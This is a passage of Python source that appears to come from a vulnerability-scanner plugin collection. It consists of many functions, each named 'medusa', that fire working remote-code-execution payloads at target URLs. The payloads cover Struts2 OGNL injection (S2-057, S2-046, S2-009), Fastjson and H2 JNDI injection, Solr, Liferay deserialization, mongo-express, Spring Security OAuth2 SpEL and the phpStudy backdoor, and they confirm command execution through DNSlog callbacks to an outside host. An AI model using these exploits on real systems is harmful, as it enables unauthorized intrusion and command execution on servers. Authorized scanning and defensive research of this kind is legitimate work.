'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=10,
verify=False)
if DL.result() and resp.status_code == 400:
Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
url, payload_url, resp.text, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port, path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
con = ""
payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host(
) + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host(
) + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/"
for payload in [payload1, payload2]:
try:
path1 = os.path.split(path)[0]
path2 = os.path.split(path)[1]
payload_url = scheme + "://" + url + ":" + str(
port) + path1 + "/" + payload + path2
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
try: # 防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False,
allow_redirects=False)
con = resp.text
except:
pass
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/"+name+"/config"
payload2 = "/solr/" + name + "/update"
payload_url = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
DL = Dnslog() # 初始化DNSlog
rm=randoms().result(10)
data1='''{"add-listener":{"event":"postCommit","name":"'''+rm+'''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["'''+DL.dns_host()+'''"]}}'''
data2='''[{"id":"'''+rm+'''"}]'''
headers2 = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json"
}
#POC没问题DNSlog有问题
#DL="p61rpm.dnslog.cn"
resp = requests.post(payload_url,data=data1,headers=headers,proxies=proxies, timeout=20, verify=False)
resp2 = requests.post(payload_url2, data=data2, headers=headers2, proxies=proxies,timeout=20, verify=False)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(url,payload_url,resp.text,resp2.text)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/api/jsonws/invoke'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "close"
}
DL = Dnslog()
#DL="http://333.q7d5zn.dnslog.cn".encode('utf-8')
hex_data = b'\xac\xed\x00\x05sr\x00=com.mchange.v2.naming.ReferenceIndirector$ReferenceSerializedb\x19\x85\xd0\xd1*\xc2\x13\x02\x00\x04L\x00\x0bcontextNamet\x00\x13Ljavax/naming/Name;L\x00\x03envt\x00\x15Ljava/util/Hashtable;L\x00\x04nameq\x00~\x00\x01L\x00\treferencet\x00\x18Ljavax/naming/Reference;xppppsr\x00\x16javax.naming.Reference\xe8\xc6\x9e\xa2\xa8\xe9\x8d\t\x02\x00\x04L\x00\x05addrst\x00\x12Ljava/util/Vector;L\x00\x0cclassFactoryt\x00\x12Ljava/lang/String;L\x00\x14classFactoryLocationq\x00~\x00\x07L\x00\tclassNameq\x00~\x00\x07xpsr\x00\x10java.util.Vector\xd9\x97}[\x80;\xaf\x01\x03\x00\x03I\x00\x11capacityIncrementI\x00\x0celementCount[\x00\x0belementDatat\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x00\x00\x00\x00\x00ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\nppppppppppxt\x00\x03Expt\x00\x1b%st\x00\x03Foo' % DL.dns_host(
).encode('utf-8')
data = str(binascii.hexlify(hex_data), encoding="utf-8")
post_data = """cmd={"/expandocolumn/update-column":{}}&p_auth=<validtoken>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:""" + data + """;"}"""
resp = requests.post(payload_url,
data=post_data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
time.sleep(3)
if DL.result():
Medusa = "{}存在LiferayPortal远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n随机的DNSLOG:{}\r\n返回数据包:{}\r\n".format(
url, payload_url, post_data, DL.dns_host(), resp.text)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/checkValid"
payload_url = scheme + "://" + url + ":" + str(port) + payload
dns = Dnslog()
data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
dns.dns_host())
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Authorization': 'Basic YWRtaW46cGFzcw==',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '123'
}
s = requests.session()
s.post(payload_url,
data=data,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
time.sleep(10)
if dns.result():
Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
url, payload_url, data)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
payload ="/h2-console/login.do?jsessionid="
payload_url = scheme + "://" + url + ":" + str(port) + payload+"ad3ae393781ccf8d7abf0345aa88e398"
jsession = requests.get(payload_url, timeout=5,proxies=proxies, verify=False, headers=headers, )
global pgroups
preg = re.compile(r"login\.jsp\?jsessionid=(.*?)'", re.S)
pgroups = re.findall(preg, jsession.text)
if not pgroups:
preg = re.compile(r"admin\.do\?jsessionid=(.*?)\"", re.S)
pgroups = re.findall(preg, jsession.text)
payload_url2 = scheme + "://" + url + ":" + str(port) + payload +pgroups[0]
headers2 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
'Referer': payload_url2,
}
DL=Dnslog()
data= "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit&user=&password="******"{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text,DL.dns_host(),str(DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
con = ""
global resp
data = b"""-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00"
Content-Type: text/plain
x
-----------------------------735323031399963166993862150--
"""
try:
payload_url = url
Headers["Content-Length"] = "10000000"
Headers[
"Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150"
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,
headers=Headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except Exception as e:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, data, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
payload = "/index.php"
commandS = ('''system("ping {}");''').format(DL.dns_host())
cmd = base64.b64encode(commandS.encode('utf-8'))
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '******',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Sec-Fetch-Site': 'none',
'accept-charset': cmd,
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': RandomAgent
}
resp = requests.get(payload_url,
headers=headers,
timeout=5,
proxies=proxies,
verify=False)
time.sleep(2)
if DL.result():
Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
url, payload_url, headers, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + '://' + url + ':' + str(port)
DL = Dnslog()
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://" + DL.dns_host() + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=10,
verify=False)
if DL.result() and resp.status_code == 500:
Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
url, payload_url, resp.text, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/checkValid"
payload_url = scheme + "://" + url + ":" + str(port) + payload
dns = Dnslog()
data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
dns.dns_host())
Headers['Accept'] = '*/*'
Headers['Authorization'] = 'Basic YWRtaW46cGFzcw=='
Headers['Connection'] = 'close'
Headers['Content-Type'] = 'application/x-www-form-urlencoded'
Headers['Content-Length'] = '123'
requests.post(payload_url,
data=data,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
time.sleep(10)
if dns.result():
Medusa = "{} 存在mongo-express远程代码执行漏洞(CVE-2019-10758)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
url, payload_url, data)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + '://' + url + ':' + str(port)
DL = Dnslog()
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://" + DL.dns_host() + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
Headers['Content-Type'] = 'application/json'
Headers["Connection"] = "close"
resp = requests.post(payload_url,
headers=Headers,
data=data,
proxies=proxies,
timeout=10,
verify=False)
if DL.result() and resp.status_code == 500:
Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
url, payload_url, resp.text, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
DL=Dnslog()
payload ="/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
payload_url = url + payload
resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
payload = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format(
DL.dns_host())
try:
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
time.sleep(3)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
